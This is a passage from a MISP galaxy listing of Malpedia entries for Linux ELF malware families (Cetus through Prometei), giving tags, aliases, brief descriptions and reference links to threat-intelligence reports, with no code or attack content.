The tag is: `misp-galaxy:malpedia="Cetus"

Cetus is also known as:

Table 956. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus">https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus</a></td>
<td></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/">https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/</a></td>
<td></td>
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Chapro

The tag is: `misp-galaxy:malpedia="Chapro"

Chapro is also known as:

Table 957. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro">https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro</a></td>
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</table>

Cloud Snooper

The tag is: `misp-galaxy:malpedia="Cloud Snooper"

Cloud Snooper is also known as:
• Snoopy

Table 958. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper">https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper</a></td>
</tr>
<tr>
<td><a href="https://www.intezer.com/blog/cloud-security/top-linux-cloud-threatsof-2020/">https://www.intezer.com/blog/cloud-security/top-linux-cloud-threatsof-2020/</a></td>
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</table>

Corona DDOS Bot

The tag is: `misp-galaxy:malpedia="Corona DDOS Bot"`

Corona DDOS Bot is also known as:

Table 959. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona">https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona</a></td>
</tr>
<tr>
<td><a href="https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/">https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/</a></td>
</tr>
</tbody>
</table>

Cpuminer (ELF)

This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.

The tag is: `misp-galaxy:malpedia="Cpuminer (ELF)"

Cpuminer (ELF) is also known as:

Table 960. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer">https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer</a></td>
</tr>
<tr>
<td><a href="https://github.com/pooler/cpuminer">https://github.com/pooler/cpuminer</a></td>
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Cr1ptT0r

The tag is: `misp-galaxy:malpedia="Cr1ptT0r"

Cr1ptT0r is also known as:

• CriptTor

Table 961. Table References
Dacls (ELF)

The tag is: *misp-galaxy:malpedia="Dacls (ELF)"

Dacls (ELF) is also known as:

Table 962. Table References

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls">https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls</a></td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/dacls-the-dual-platform-rat/">https://blog.netlab.360.com/dacls-the-dual-platform-rat/</a></td>
</tr>
<tr>
<td><a href="https://www.sygnia.co/mata-framework">https://www.sygnia.co/mata-framework</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/">https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/</a></td>
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Dark Nexus

The tag is: *misp-galaxy:malpedia="Dark Nexus"

Dark Nexus is also known as:

Table 963. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus">https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus</a></td>
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ddoor

The tag is: *misp-galaxy:malpedia="ddoor"
Doki

The tag is: `misp-galaxy:malpedia="Doki"

Doki is also known as:

Table 965. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki">https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki</a></td>
</tr>
<tr>
<td><a href="https://www.securecoding.com/blog/all-about-doki-malware/">https://www.securecoding.com/blog/all-about-doki-malware/</a></td>
</tr>
</tbody>
</table>

DoubleFantasy (ELF)

The tag is: `misp-galaxy:malpedia="DoubleFantasy (ELF)"

DoubleFantasy (ELF) is also known as:

Table 966. Table References

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy">https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy</a></td>
</tr>
<tr>
<td><a href="https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf">https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf</a></td>
</tr>
</tbody>
</table>

Ebury

This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.

This family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.

The tag is: `misp-galaxy:malpedia="Ebury"
Ebury is also known as:

Table 967. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury">https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/">https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/</a></td>
</tr>
</tbody>
</table>

**Echobot**

The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.

When it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.


The tag is: `misp-galaxy:malpedia~“Echobot”`

Echobot is also known as:

Table 968. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot">https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/">https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/</a></td>
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</table>
**Erebus (ELF)**

The tag is: misp-galaxy:malpedia="Erebus (ELF)"

Erebus (ELF) is also known as:

Table 969. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus">https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus</a></td>
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**EvilGnome**

The tag is: misp-galaxy:malpedia="EvilGnome"

EvilGnome is also known as:

Table 970. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome">https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome</a></td>
</tr>
<tr>
<td><a href="https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/">https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/</a></td>
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**Exaramel (ELF)**

The tag is: misp-galaxy:malpedia="Exaramel (ELF)"

Exaramel (ELF) is also known as:

Table 971. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel">https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel</a></td>
</tr>
<tr>
<td><a href="https://www.wired.com/story/sandworm-centreon-russia-hack/">https://www.wired.com/story/sandworm-centreon-russia-hack/</a></td>
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<tr>
<td><a href="https://twitter.com/craiu/status/1361581668092493824">https://twitter.com/craiu/status/1361581668092493824</a></td>
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**ext4**

The tag is: `misp-galaxy:malpedia="ext4"`

ext4 is also known as:

Table 972. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4">https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4</a></td>
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<tr>
<td><a href="https://www.recordedfuture.com/chinese-cyberespionage-operations/">https://www.recordedfuture.com/chinese-cyberespionage-operations/</a></td>
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**FBot**

The tag is: `misp-galaxy:malpedia="FBot"`

FBot is also known as:

Table 973. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot">https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot</a></td>
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<tr>
<td><a href="https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html">https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html</a></td>
</tr>
<tr>
<td><a href="https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html">https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html</a></td>
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**FinFisher (ELF)**

The tag is: `misp-galaxy:malpedia="FinFisher (ELF)"`

FinFisher (ELF) is also known as:

Table 974. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher">https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher</a></td>
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floodor

The tag is: misp-galaxy:malpedia="floodor"

floodor is also known as:

Table 975. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor">https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor</a></td>
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<tr>
<td><a href="https://github.com/Thibault-69/Floodor">https://github.com/Thibault-69/Floodor</a></td>
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</table>

FritzFrog

Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.

The tag is: misp-galaxy:malpedia="FritzFrog"

FritzFrog is also known as:

Table 976. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog">https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog</a></td>
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Gitpaste-12

The tag is: misp-galaxy:malpedia="Gitpaste-12"

Gitpaste-12 is also known as:

Table 977. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12">https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12</a></td>
</tr>
<tr>
<td><a href="https://blogs.juniper.net/en-us/threat-research/gitpaste-12">https://blogs.juniper.net/en-us/threat-research/gitpaste-12</a></td>
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Godlua

The tag is: misp-galaxy:malpedia="Godlua"

Godlua is also known as:
GOSH

The tag is: misp-galaxy:malpedia="GOSH"

GOSH is also known as:

GreedyAntd

The tag is: misp-galaxy:malpedia="GreedyAntd"

GreedyAntd is also known as:

Haiduc

The tag is: misp-galaxy:malpedia="Haiduc"

Haiduc is also known as:

Hajime

The tag is: misp-galaxy:malpedia="Hajime"
Hajime is also known as:

Table 982. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime">https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime</a></td>
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<td><a href="https://par.nsf.gov/servlets/purl/10096257">https://par.nsf.gov/servlets/purl/10096257</a></td>
</tr>
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<td><a href="https://x86.re/blog/hajime-a-follow-up/">https://x86.re/blog/hajime-a-follow-up/</a></td>
</tr>
<tr>
<td><a href="https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461">https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461</a></td>
</tr>
<tr>
<td><a href="https://github.com/Psychotropos/hajime_hashes">https://github.com/Psychotropos/hajime_hashes</a></td>
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Hakai

The tag is: `misp-galaxy:malpedia="Hakai"`

Hakai is also known as:

Table 983. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai">https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai</a></td>
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</table>

HandyMannyPot

The tag is: `misp-galaxy:malpedia="HandyMannyPot"`

HandyMannyPot is also known as:

Table 984. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot">https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot</a></td>
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<tr>
<td><a href="https://twitter.com/liuya0904/status/1171633662502350848">https://twitter.com/liuya0904/status/1171633662502350848</a></td>
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</table>

Hand of Thief

The tag is: `misp-galaxy:malpedia="Hand of Thief"`
Hand of Thief is also known as:

- Hanthie

Table 985. Table References

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HiddenWasp

The tag is: misp-galaxy:malpedia="HiddenWasp"

HiddenWasp is also known as:

Table 986. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp">https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp</a></td>
</tr>
<tr>
<td><a href="https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/">https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/</a></td>
</tr>
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</table>

Hide and Seek

The tag is: misp-galaxy:malpedia="Hide and Seek"

Hide and Seek is also known as:

- HNS

Table 987. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek">https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek</a></td>
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<tr>
<td><a href="https://threatlabs.avast.com/botnet">https://threatlabs.avast.com/botnet</a></td>
</tr>
<tr>
<td><a href="https://blog.avast.com/hide-n-seek-botnet-continues">https://blog.avast.com/hide-n-seek-botnet-continues</a></td>
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Icnanker

The tag is: *misp-galaxy:malpedia*="Icnanker"

Icnanker is also known as:

Table 988. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker">https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker</a></td>
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IoT Reaper

The tag is: *misp-galaxy:malpedia*="IoT Reaper"

IoT Reaper is also known as:

- IoTroop
- Reaper
- iotreaper

Table 989. Table References

<table>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper">https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper</a></td>
</tr>
<tr>
<td><a href="https://research.checkpoint.com/new-iot-botnet-storm-coming/">https://research.checkpoint.com/new-iot-botnet-storm-coming/</a></td>
</tr>
</tbody>
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IPStorm (ELF)

The tag is: *misp-galaxy:malpedia*="IPStorm (ELF)"

IPStorm (ELF) is also known as:

- InterPlanetary Storm
JenX

The tag is: misp-galaxy:malpedia="JenX"

JenX is also known as:

Kaiji

Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.

The tag is: misp-galaxy:malpedia="Kaiji"

Kaiji is also known as:
Kaiten

The tag is: *misp-galaxy:malpedia="Kaiten"

Kaiten is also known as:

- STD

Table 993. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten">https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten</a></td>
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<tr>
<td><a href="https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/">https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/</a></td>
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kerberods

The tag is: *misp-galaxy:malpedia="kerberods"

kerberods is also known as:

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods">https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods</a></td>
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<td><a href="https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916">https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916</a></td>
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Kinsing

The tag is: *misp-galaxy:malpedia="Kinsing"

Kinsing is also known as:

- h2miner

Table 995. Table References
Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing
https://unit42.paloaltonetworks.com/cve-2020-25213/
https://redcanary.com/blog/kinsing-malware-citrix-saltstack/
https://twitter.com/IntezerLabs/status/1259818964848386048
https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743

Kobalos

The tag is: misp-galaxy:malpedia="Kobalos"

Kobalos is also known as:

Table 996. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos">https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos</a></td>
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<tr>
<td><a href="https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/">https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/</a></td>
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Lady

The tag is: misp-galaxy:malpedia="Lady"

Lady is also known as:

Table 997. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady">https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady</a></td>
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<td><a href="https://news.drweb.com/news/?i=10140&amp;lng=en">https://news.drweb.com/news/?i=10140&amp;lng=en</a></td>
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LeetHozer

The tag is: misp-galaxy:malpedia="LeetHozer"
LeetHozer is also known as:

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer">https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer</a></td>
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<tr>
<td><a href="https://blog.netlab.360.com/the-leethozer-botnet-en/">https://blog.netlab.360.com/the-leethozer-botnet-en/</a></td>
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LiLock

The tag is: `misp-galaxy:malpedia="LiLock"`

LiLock is also known as:

- Lilocked
- Lilu

Table 999. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock">https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock</a></td>
</tr>
<tr>
<td><a href="https://fossbytes.com/liloked-ransomware-infected-linux-servers/">https://fossbytes.com/liloked-ransomware-infected-linux-servers/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html">https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html</a></td>
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</table>

lilyofthevalley

The tag is: `misp-galaxy:malpedia="lilyofthevalley"`

lilyofthevalley is also known as:

Table 1000. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley">https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley</a></td>
</tr>
<tr>
<td><a href="https://github.com/En14c/LilyOfTheValley">https://github.com/En14c/LilyOfTheValley</a></td>
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</tbody>
</table>

LiquorBot

BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency.
The tag is: `misp-galaxy:malpedia="LiquorBot"`

LiquorBot is also known as:

*Table 1001. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot">https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot</a></td>
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</table>

**Loerbas**

Loader and Cleaner components used in attacks against high-performance computing centers in Europe.

The tag is: `misp-galaxy:malpedia="Loerbas"`

Loerbas is also known as:

*Table 1002. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas">https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas</a></td>
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<tr>
<td><a href="https://atdotde.blogspot.com/2020/05/high-performance-hackers.html">https://atdotde.blogspot.com/2020/05/high-performance-hackers.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/nunohaien/status/1261281419483140096">https://twitter.com/nunohaien/status/1261281419483140096</a></td>
</tr>
<tr>
<td><a href="https://www.cadosecurity.com/2020/05/16/1318/">https://www.cadosecurity.com/2020/05/16/1318/</a></td>
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**Log Collector**

The tag is: `misp-galaxy:malpedia="Log Collector"`

Log Collector is also known as:

*Table 1003. Table References*

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<th>Links</th>
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**Lootwodniw**

The tag is: `misp-galaxy:malpedia="Lootwodniw"`

Lootwodniw is also known as:
Masuta

Masuta takes advantage of the EDB 38722 D-Link exploit.

The tag is: misp-galaxy:malpedia="Masuta"

Masuta is also known as:

• PureMasuta

Matryosh

The tag is: misp-galaxy:malpedia="Matryosh"

Matryosh is also known as:

MESSAGETAP

MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.

The tag is: misp-galaxy:malpedia="MESSAGETAP"

MESSAGETAP is also known as:
Table 1007. Table References

<table>
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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap">https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html">https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html</a></td>
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</table>

Midrashim

A x64 ELF file infector with non-destructive payload.

The tag is: *misp-galaxy:malpedia=“Midrashim”*

Midrashim is also known as:

Table 1008. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim">https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim</a></td>
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<tr>
<td><a href="https://www.guitmz.com/linux-midrashim-elf-virus/">https://www.guitmz.com/linux-midrashim-elf-virus/</a></td>
</tr>
<tr>
<td><a href="https://github.com/guitmz/midrashim">https://github.com/guitmz/midrashim</a></td>
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MiKey

The tag is: *misp-galaxy:malpedia=“MiKey”*

MiKey is also known as:

Table 1009. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey">https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey</a></td>
</tr>
<tr>
<td><a href="https://securitykitten.github.io/2016/12/14/mikey.html">https://securitykitten.github.io/2016/12/14/mikey.html</a></td>
</tr>
</tbody>
</table>

Mirai (ELF)

Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many
vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.

The tag is: *misp-galaxy:malpedia="Mirai (ELF)"

Mirai (ELF) is also known as:

- Katana

**Table 1010. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai">https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai</a></td>
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<tr>
<td><a href="https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html">https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/">https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/">https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/</a></td>
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<td><a href="https://isc.sans.edu/diary/22786">https://isc.sans.edu/diary/22786</a></td>
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<tr>
<td><a href="https://github.com/jgamblin/Mirai-Source-Code">https://github.com/jgamblin/Mirai-Source-Code</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/">https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/">https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/</a></td>
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</table>
Mokes (ELF)

The tag is: misp-galaxy:malpedia="Mokes (ELF)"

Mokes (ELF) is also known as:

Table 1011. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes

MooBot

The tag is: misp-galaxy:malpedia="MooBot"

MooBot is also known as:

Table 1012. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/

Moose

The tag is: misp-galaxy:malpedia="Moose"

Moose is also known as:

Table 1013. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose
http://www.welivesecurity.com/2015/05/26/moose-router-worm/
http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/
http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/

Mozi

The tag is: misp-galaxy:malpedia="Mozi"
Mozi is also known as:

Table 1014. Table References

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MrBlack

The tag is: `misp-galaxy:malpedia="MrBlack"`

MrBlack is also known as:

Table 1015. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack">https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack</a></td>
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<td><a href="https://news.drweb.com/?i=5760&amp;c=23&amp;lng=en">https://news.drweb.com/?i=5760&amp;c=23&amp;lng=en</a></td>
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Nextcry Ransomware

The tag is: `misp-galaxy:malpedia="Nextcry Ransomware"`

Nextcry Ransomware is also known as:

Table 1016. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry">https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry</a></td>
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</table>

Ngioweb (ELF)

The tag is: `misp-galaxy:malpedia="Ngioweb (ELF)"`

Ngioweb (ELF) is also known as:

Table 1017. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb">https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb</a></td>
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<tr>
<td><a href="https://twitter.com/IntezerLabs/status/1324346324683206657">https://twitter.com/IntezerLabs/status/1324346324683206657</a></td>
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</table>
NOTROBIN

FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

The tag is: `misp-galaxy:malpedia="NOTROBIN"`

NOTROBIN is also known as:

- `remove_bds`

Table 1018. Table References

<table>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin">https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin</a></td>
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<td><a href="https://news.sophos.com/en-us/2020/05/21/asnarok2/">https://news.sophos.com/en-us/2020/05/21/asnarok2/</a></td>
</tr>
<tr>
<td><a href="https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/">https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/</a></td>
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<tr>
<td><a href="https://www.theregister.co.uk/2020/01/17/hackers_patchCitrix_vulnerability/">https://www.theregister.co.uk/2020/01/17/hackers_patchCitrix_vulnerability/</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html">https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html</a></td>
</tr>
</tbody>
</table>

Owari

Mirai variant by actor "Anarchy" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.

The tag is: `misp-galaxy:malpedia="Owari"`

Owari is also known as:

Table 1019. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari">https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari</a></td>
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</table>
According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.

The tag is: *misp-galaxy:malpedia=*p0sT5n1F3r*

**p0sT5n1F3r**

**Penquin Turla**

The tag is: *misp-galaxy:malpedia=*Penquin Turla*
**PerlBot**

The tag is: `misp-galaxy:malpedia="PerlBot"`

PerlBot is also known as:

- DDoS Perl IrcBot
- ShellBot

*Table 1022. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot">https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot</a></td>
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<td><a href="https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&amp;C_appendix.pdf">https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&amp;C_appendix.pdf</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-345a">https://us-cert.cisa.gov/ncas/alerts/aa20-345a</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/Nocturnus/status/1308430959512092673">https://twitter.com/Nocturnus/status/1308430959512092673</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/">https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/</a></td>
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**Persirai**

The tag is: `misp-galaxy:malpedia="Persirai"`

Persirai is also known as:

*Table 1023. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai">https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai</a></td>
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**PLEAD (ELF)**

The tag is: `misp-galaxy:malpedia="PLEAD (ELF)"

PLEAD (ELF) is also known as:

**Table 1024. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.lead">https://malpedia.caad.fkie.fraunhofer.de/details/elf.lead</a></td>
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<tr>
<td><a href="https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape">https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape</a></td>
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**Prometei**

The tag is: `misp-galaxy:malpedia="Prometei"

Prometei is also known as:

**Table 1025. Table References**

